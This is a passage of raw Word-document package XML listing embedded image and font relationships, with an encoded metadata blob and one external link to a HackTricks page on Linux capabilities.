Target="https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_admin" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/></Relationships>
</file>

<file path=word/_rels/fontTable.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.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6.jpg"/><Relationship Id="rId2"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31.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8AUvZre2fvNIPfFn+wMj6GLG1FQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnB6dDBtYmtzcjZyYTIOaC5yaGJrdXByZGFpMmgyDWguZnhubXB2aGUxY3AyDmgucG9hZzhpZWtodnlyMg5oLmxyaHljeGtnZXpyaDIOaC4zb2ZoNDU1ODBrZzUyDmguZDA0djUydHo1bWM3Mg5oLml0d2Q2cW9pa3IydjIOaC4xNzVmNWNzOTR6MG84AHIhMXlpMl9GZGNCQWppX1pLZHdfSlNpODZXakFCa1Z1ckVH</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